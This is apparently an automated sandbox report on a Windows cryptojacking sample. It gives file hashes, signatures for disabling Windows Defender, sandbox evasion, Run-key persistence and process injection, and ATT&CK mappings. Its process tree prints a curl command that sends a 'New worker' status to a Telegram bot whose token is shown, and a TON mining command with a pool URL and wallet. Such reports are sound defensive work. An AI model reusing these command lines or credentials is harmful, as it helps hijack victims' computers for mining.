Analysis

  • max time kernel
    4264954s
  • max time network
    9s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-en-20220113
  • submitted
    17-01-2022 15:54

General

  • Target

    acabd1f99b9e449d951dea975e1f1ad5.exe

  • Size

    1.0MB

  • MD5

    acabd1f99b9e449d951dea975e1f1ad5

  • SHA1

    ef545ca153737d6246be2cd3de1b26fb92241327

  • SHA256

    63e38dc331cd8b202d9109dd5b0e08162673c0661344a06252811d066548c31b

  • SHA512

    e92d6a0f11d2d96267682eed231e8f5580e32df705bc6c0eeb0b6f7fbbe7c56c67267c8e1994c55bb724343e904137808e1fc9636750d2730aa42b3bf217abd1

Malware Config

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Downloads MZ/PE file
  • UPX packed file 1 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Themida packer 3 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\acabd1f99b9e449d951dea975e1f1ad5.exe
    "C:\Users\Admin\AppData\Local\Temp\acabd1f99b9e449d951dea975e1f1ad5.exe"
    1⤵
    • Checks BIOS information in registry
    • Adds Run key to start application
    • Checks whether UAC is enabled
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:2476
    • C:\Windows\SYSTEM32\curl.exe
      curl "https://api.telegram.org/bot5085421438:AAHmPt5uQhWzP79_WEIMYB3Sq6kZ9Hu2cNo/sendMessage?chat_id=-1001672031538&text=%F0%9F%99%88 New worker!%0AGPU: Microsoft Basic Display Adapter%0AWorker Tag: None%0A(Windows Defender has been turned off)"
      2⤵
        PID:3692
      • C:\Windows\bfsvc.exe
        C:\Windows\bfsvc.exe -a TON --pool https://server1.whalestonpool.com --user EQBUrKc4jK39eXKGOmJfeEZjVLiZ9aSuxI-G7GPl6_9e9Bwj
        2⤵
          PID:2560
        • C:\Windows\explorer.exe
          C:\Windows\explorer.exe "None" "Microsoft%20Basic%20Display%20Adapter" "None" "ton"
          2⤵
            PID:4088

        Network

        MITRE ATT&CK Matrix ATT&CK v6

        Persistence

        Modify Existing Service

        1
        T1031

        Registry Run Keys / Startup Folder

        1
        T1060

        Defense Evasion

        Modify Registry

        2
        T1112

        Disabling Security Tools

        1
        T1089

        Virtualization/Sandbox Evasion

        1
        T1497

        Discovery

        Query Registry

        2
        T1012

        Virtualization/Sandbox Evasion

        1
        T1497

        System Information Discovery

        2
        T1082

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • memory/2476-131-0x00007FF74CB90000-0x00007FF74CF5C000-memory.dmp
          Filesize

          3.8MB

        • memory/2476-132-0x00007FF74CB90000-0x00007FF74CF5C000-memory.dmp
          Filesize

          3.8MB

        • memory/2476-133-0x00007FF74CB90000-0x00007FF74CF5C000-memory.dmp
          Filesize

          3.8MB

        • memory/2560-136-0x00000001427491D0-mapping.dmp
        • memory/2560-135-0x0000000140000000-0x000000014274C000-memory.dmp
          Filesize

          39.3MB

        • memory/3692-134-0x0000000000000000-mapping.dmp
        • memory/4088-137-0x0000000140000000-0x000000014002A000-memory.dmp
          Filesize

          168KB

        • memory/4088-138-0x0000000140001E00-mapping.dmp